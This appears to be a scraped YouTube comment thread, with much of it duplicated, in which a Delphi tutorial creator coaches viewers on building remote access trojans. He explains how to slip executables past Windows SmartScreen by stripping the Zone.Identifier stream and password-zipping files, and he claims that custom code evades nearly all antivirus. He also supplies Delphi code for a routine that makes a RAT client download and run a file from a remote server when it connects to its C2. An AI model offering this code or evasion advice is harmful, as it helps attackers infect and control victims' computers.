@@VERTEXOp no that's why I said in the video I don't consider it a bypass all this code does is strip it of its alternate data streams and the Zone identifier so that it can be used to bypass Windows smart screen however it's up to you after you use the code to clean it you have to send it carefully like Zip It Up password protected do something so that web browsers cannot get to it to mark it with the Zone identifier number 3 showing that it came from the internet Zone thus triggering windows smart screen.
@VERTEXOp It works if used correctly. You have to understand that once you strip an executable file of its Zone identifier number 3 it can then bypass Windows smart screen the problem is that when other people download your exe file from the Internet it's going to be retagged with Zone identifier number 3 every single time most likely unless you upload to like a trusted Source or something so you see once they download your file it gets retagged with his own identifier number 3 showing that it came from the internet thus triggering Windows smart screen. To keep that from happening what you need to do is use the software to strip the file of its Zone identifier number three then zip the file up in some sort of archive to keep it protected this way web browsers cannot see it directly and cannot market with the Zone identifier number 3. So you see you can bypass Windows smartscreen easily when I stated I don't consider this a bypass it's because I don't consider it a direct bypass method it's not an exploit all the code does is merely remove an alternate data stream from an executable file nothing more and nothing less.
Any bypass video please make if we download from anywhere from internet it bypass smartscreen please make video and does .js and .reg bypassing smartscreen because some crypter how they bypassing smartscreen from .js file
@VERTEXOp if the cryptor outputs an executable file it wouldn't matter if there was a file packed with it capable of Performing dll sideloading because the exe file itself would already be flagged if downloaded from an untrusted Source therefore no code would be able to execute in the first place. (If the user did not allow it through windows smartscreen). And if outputting batch files or any other type of scripting files say for example for something like Powershell you run into even worse troubles having to bypass amsi not to mention you include a host of new dependencies and requirements to get your code to run on the client machine which in my view makes it a million times worse. This is why I choose Delphi as my one and only programming language the more files you include of different types the more languages you have to know and understand and the more dependencies you introduce to your projects. The more dependencies you have the less likely your code is to run as expected in any given environment. Ultimately why write code to bypass Windows smart screen when you don't have to bypass Windows smartscreen because you already bypass it by default? Keep in mind the more noise you make on a system the more likely your binary is to get caught by AV. And one other thing this is just kind of for the record type deal I've been writing Pascal/Delphi code for over 20 years none of the stuff that I've given out to people that I expected to run and bypass has ever been detected and that includes both smartscreen and AV companies! Which brings me to my next point you don't ever need a cryptor as long as you code your own projects. For some reason most people have trouble understanding this but if you want to hide from antivirus just code your own project by default you will bypass 99% of them guaranteed especially in Pascal/Delphi.
Can you teach us how to do tasks? For example when client connects to C2 it will automatically download and execute a file on their computer. (Sorry for commenting twice lol)
Usually RAT's written in Native programming languages do not need to download external Dependencies, Kind of defeats the purpose of using a Native programming languages but I suppose if you wrote it that way to be "Modular" or whatever that's fine... to do what you've asked all you would have to do is depending on the socket library you have chosen to go with there will be an "OnConnect Event" both on the client side and the server side that you can write some logic in to do whatever "Tasks" you need Check out some of my socket training videos: ua-cam.com/video/nTFDiRje7cU/v-deo.html, ua-cam.com/video/e7wjOgnGMJY/v-deo.html, ua-cam.com/video/t_jykzyf5nU/v-deo.html, ua-cam.com/video/b46OT2daq_k/v-deo.html, ua-cam.com/video/vUnPBdVzFeI/v-deo.html, ua-cam.com/video/Nuasl8xfCmA/v-deo.html. They may shed some light on the socket events and stuff. As for downloading a file from a URL and executing it the process would be quite simple just find the IdHTTP component or a similar HTTP component drag and drop it to your form OR simply include its Uses statement and create it virtually in code if you are doing things from the Client side since usually a RAT client will not have a GUI directly but rather be in the form of a Console application. Once you have everything in place for the HTTP stuff you also need to include ShellAPI in your uses statement so you can make windows shellexecute the .exe file or whatever... Here is a Really good example code to accomplish what your trying to do (Keep in mind I'm writing this from memory I'm not testing it but it should work) //We make a Procedure which we can simply call to download the .exe file and execute it after the download finishes... procedure DownloadAndRunExe(const URL, FileName: string); var IdHTTP: TIdHTTP; //The HTTP component responsible for downloading the .exe binary from a URL... FileStream: TFileStream; // This could be a Filestream or a Tmemorystream whatever suits your needs... begin IdHTTP := TIdHTTP.Create(nil); //Creating the HTTP component with no parent so it just sits in memory waiting to be used... try FileStream := TFileStream.Create(FileName, fmCreate); // Creating a filestream to your SSD/HDD, the Filename is both the name and path to the .exe //in this case keeping it simple like myfile.exe would result in the .exe being saved at the same location your client.exe is running from... try IdHTTP.Get(URL, FileStream); // Getting Or DOWNLOADING the file from the internet... (SUPER EASY) finally FileStream.Free; //Once file is finished downloading we need to free the FileStream Variable so it no longer takes up memory space... end; finally IdHTTP.Free; // Since we are finished using the HTTP component its good practice to just free this as well... no need to take up memory... end; // Running the downloaded .exe file ShellExecute(0, 'open', PChar(FileName), nil, nil, SW_SHOWNORMAL); // Uses Windows ShellExecute API to run the file you input, in this case the .exe you //Downloaded from the internet... end; // To use this code simply call the following single line of code in your sockets "OnConnected or OnConnect Events as needed" DownloadAndRunExe('example.com/file.exe', 'C:\DownloadedFile.exe'); //Take note that the seccond parameter can either be a filename by itself OR a path and the filename... //Simply putting something like file.exe instead of C:\file.exe would place the downloaded file along side the client.exe's running location. I hope I explained this well enough and if you need further assistance just let me know!
@@BitmasterXor thanks, I use netcom7. OnConnect I will make it check if there is any tasks and if there is chdck it’s parameters (eg URL, file name, and to execute in memory or disk), if there is then I will send a command with those parameters to the client to execute the task.
As an added bonus to this question a little piece of advise the Default installed INDY socket components which include the IDHttp component do not handle SSL "out of the box" so sites that host files which have HTTPS
No worries on posting twice man... did you get it working ok? I forgot to mention to you that you don't just have to make it download a file from a website using HTTP you can also send a raw file over the established TCP socket connection the client has made to your server if you wanted to as well.
I am planning on making a series of videos concerning RAT Development, however I'm not sure about using RAW Winsock lol that takes quite a bit more effort rather than simply using a wrapper, I may make a video covering Winsock or something though. Also if you have not already check out all my other videos covering socket wrappers and socket components (I basically show how to make a mini RAT in each video) ua-cam.com/video/nTFDiRje7cU/v-deo.html ua-cam.com/video/e7wjOgnGMJY/v-deo.html ua-cam.com/video/t_jykzyf5nU/v-deo.html ua-cam.com/video/b46OT2daq_k/v-deo.html ua-cam.com/video/vUnPBdVzFeI/v-deo.html ua-cam.com/video/Nuasl8xfCmA/v-deo.html Thanks For Watching! 😃
@@BitmasterXor I have found src of spyn3t on github and it uses winsock but its hard for undestand the logic lol ,80 000 lines of code , pls make a video on rat more easy to understand and with winsock if possible 🙂
Saw you posted a comment but i do not see it on here but here is some further information for you: SpyNet RAT was not made using Raw Winsock, it has the Winsock uses statement on the server endpoint but that's only because to make the rat project the author used a combination of TclientSocket and TServerSocket on the server side, and on the client side he used (INDY 9 sockets)... both libraries are really old and only used for legacy based stuff anymore these days. We have much better socket libraries and wrappers like "NetCom7", "MorMot", "TMS Sockets", "DZSockets which are basically an upgraded version of Tclientsocket and TServersocket", "INDY 10 Sockets.... which are an updated version of the INDY 9 sockets used in the SpyNet rat project".... and many many more!
Amazing the content.
Amazing the way you explain coding.
G.
@atcbrambo yea i try to break things down and make them super easy to understand for people.
Thank you, directly from Brazil!
@marlon5344 Your Welcome!
Does smartscreen it bypass if we download that from link also ?
@@VERTEXOp no that's why I said in the video I don't consider it a bypass all this code does is strip it of its alternate data streams and the Zone identifier so that it can be used to bypass Windows smart screen however it's up to you after you use the code to clean it you have to send it carefully like Zip It Up password protected do something so that web browsers cannot get to it to mark it with the Zone identifier number 3 showing that it came from the internet Zone thus triggering windows smart screen.
Oh completely wont works ?
@VERTEXOp It works if used correctly. You have to understand that once you strip an executable file of its Zone identifier number 3 it can then bypass Windows smart screen the problem is that when other people download your exe file from the Internet it's going to be retagged with Zone identifier number 3 every single time most likely unless you upload to like a trusted Source or something so you see once they download your file it gets retagged with his own identifier number 3 showing that it came from the internet thus triggering Windows smart screen. To keep that from happening what you need to do is use the software to strip the file of its Zone identifier number three then zip the file up in some sort of archive to keep it protected this way web browsers cannot see it directly and cannot market with the Zone identifier number 3.
So you see you can bypass Windows smartscreen easily when I stated I don't consider this a bypass it's because I don't consider it a direct bypass method it's not an exploit all the code does is merely remove an alternate data stream from an executable file nothing more and nothing less.
Any bypass video please make if we download from anywhere from internet it bypass smartscreen please make video and does .js and .reg bypassing smartscreen because some crypter how they bypassing smartscreen from .js file
@VERTEXOp if the cryptor outputs an executable file it wouldn't matter if there was a file packed with it capable of Performing dll sideloading because the exe file itself would already be flagged if downloaded from an untrusted Source therefore no code would be able to execute in the first place. (If the user did not allow it through windows smartscreen).
And if outputting batch files or any other type of scripting files say for example for something like Powershell you run into even worse troubles having to bypass amsi not to mention you include a host of new dependencies and requirements to get your code to run on the client machine which in my view makes it a million times worse.
This is why I choose Delphi as my one and only programming language the more files you include of different types the more languages you have to know and understand and the more dependencies you introduce to your projects. The more dependencies you have the less likely your code is to run as expected in any given environment.
Ultimately why write code to bypass Windows smart screen when you don't have to bypass Windows smartscreen because you already bypass it by default? Keep in mind the more noise you make on a system the more likely your binary is to get caught by AV.
And one other thing this is just kind of for the record type deal I've been writing Pascal/Delphi code for over 20 years none of the stuff that I've given out to people that I expected to run and bypass has ever been detected and that includes both smartscreen and AV companies! Which brings me to my next point you don't ever need a cryptor as long as you code your own projects. For some reason most people have trouble understanding this but if you want to hide from antivirus just code your own project by default you will bypass 99% of them guaranteed especially in Pascal/Delphi.
Can you teach us how to do tasks?
For example when client connects to C2 it will automatically download and execute a file on their computer.
(Sorry for commenting twice lol)
Usually RAT's written in Native programming languages do not need to download external Dependencies, Kind of defeats the purpose of using a Native programming languages but I suppose if you wrote it that way to be "Modular" or whatever that's fine... to do what you've asked all you would have to do is depending on the socket library you have chosen to go with there will be an "OnConnect Event" both on the client side and the server side that you can write some logic in to do whatever "Tasks" you need Check out some of my socket training videos: ua-cam.com/video/nTFDiRje7cU/v-deo.html, ua-cam.com/video/e7wjOgnGMJY/v-deo.html, ua-cam.com/video/t_jykzyf5nU/v-deo.html, ua-cam.com/video/b46OT2daq_k/v-deo.html, ua-cam.com/video/vUnPBdVzFeI/v-deo.html, ua-cam.com/video/Nuasl8xfCmA/v-deo.html. They may shed some light on the socket events and stuff.
As for downloading a file from a URL and executing it the process would be quite simple just find the IdHTTP component or a similar HTTP component drag and drop it to your form OR simply include its Uses statement and create it virtually in code if you are doing things from the Client side since usually a RAT client will not have a GUI directly but rather be in the form of a Console application. Once you have everything in place for the HTTP stuff you also need to include ShellAPI in your uses statement so you can make windows shellexecute the .exe file or whatever...
Here is a Really good example code to accomplish what your trying to do (Keep in mind I'm writing this from memory I'm not testing it but it should work)
//We make a Procedure which we can simply call to download the .exe file and execute it after the download finishes...
procedure DownloadAndRunExe(const URL, FileName: string);
var
IdHTTP: TIdHTTP; //The HTTP component responsible for downloading the .exe binary from a URL...
FileStream: TFileStream; // This could be a Filestream or a Tmemorystream whatever suits your needs...
begin
IdHTTP := TIdHTTP.Create(nil); //Creating the HTTP component with no parent so it just sits in memory waiting to be used...
try
FileStream := TFileStream.Create(FileName, fmCreate); // Creating a filestream to your SSD/HDD, the Filename is both the name and path to the .exe
//in this case keeping it simple like myfile.exe would result in the .exe being saved at the same location your client.exe is running from...
try
IdHTTP.Get(URL, FileStream); // Getting Or DOWNLOADING the file from the internet... (SUPER EASY)
finally
FileStream.Free; //Once file is finished downloading we need to free the FileStream Variable so it no longer takes up memory space...
end;
finally
IdHTTP.Free; // Since we are finished using the HTTP component its good practice to just free this as well... no need to take up memory...
end;
// Running the downloaded .exe file
ShellExecute(0, 'open', PChar(FileName), nil, nil, SW_SHOWNORMAL); // Uses Windows ShellExecute API to run the file you input, in this case the .exe you
//Downloaded from the internet...
end;
// To use this code simply call the following single line of code in your sockets "OnConnected or OnConnect Events as needed"
DownloadAndRunExe('example.com/file.exe', 'C:\DownloadedFile.exe');
//Take note that the seccond parameter can either be a filename by itself OR a path and the filename...
//Simply putting something like file.exe instead of C:\file.exe would place the downloaded file along side the client.exe's running location.
I hope I explained this well enough and if you need further assistance just let me know!
@@BitmasterXor thanks, I use netcom7.
OnConnect I will make it check if there is any tasks and if there is chdck it’s parameters (eg URL, file name, and to execute in memory or disk), if there is then I will send a command with those parameters to the client to execute the task.
As an added bonus to this question a little piece of advise the Default installed INDY socket components which include the IDHttp component do not handle SSL "out of the box" so sites that host files which have HTTPS
No worries on posting twice man... did you get it working ok? I forgot to mention to you that you don't just have to make it download a file from a website using HTTP you can also send a raw file over the established TCP socket connection the client has made to your server if you wanted to as well.
Please video on rat in delphi with winsock ❤
I am planning on making a series of videos concerning RAT Development, however I'm not sure about using RAW Winsock lol that takes quite a bit more effort rather than simply using a wrapper, I may make a video covering Winsock or something though.
Also if you have not already check out all my other videos covering socket wrappers and socket components (I basically show how to make a mini RAT in each video)
ua-cam.com/video/nTFDiRje7cU/v-deo.html
ua-cam.com/video/e7wjOgnGMJY/v-deo.html
ua-cam.com/video/t_jykzyf5nU/v-deo.html
ua-cam.com/video/b46OT2daq_k/v-deo.html
ua-cam.com/video/vUnPBdVzFeI/v-deo.html
ua-cam.com/video/Nuasl8xfCmA/v-deo.html
Thanks For Watching!
😃
@@BitmasterXor I have found src of spyn3t on github and it uses winsock but its hard for undestand the logic lol ,80 000 lines of code , pls make a video on rat more easy to understand and with winsock if possible 🙂
Saw you posted a comment but i do not see it on here but here is some further information for you:
SpyNet RAT was not made using Raw Winsock, it has the Winsock uses statement on the server endpoint but that's only because to make the rat project the author used a combination of TclientSocket and TServerSocket on the server side, and on the client side he used (INDY 9 sockets)... both libraries are really old and only used for legacy based stuff anymore these days. We have much better socket libraries and wrappers like "NetCom7", "MorMot", "TMS Sockets", "DZSockets which are basically an upgraded version of Tclientsocket and TServersocket", "INDY 10 Sockets.... which are an updated version of the INDY 9 sockets used in the SpyNet rat project".... and many many more!
@@BitmasterXorok thank you so much , i hope you will add new tutorials soon
@@bernardoportugues1157 Ill be working on some new stuff for you guys, Hopefully i can get around to posting it sometime soon! 😃
Can I get your mail or TG? If possible?
@@RaGhav363 my DC is bitmasterxor if u need to talk to me directly or privately.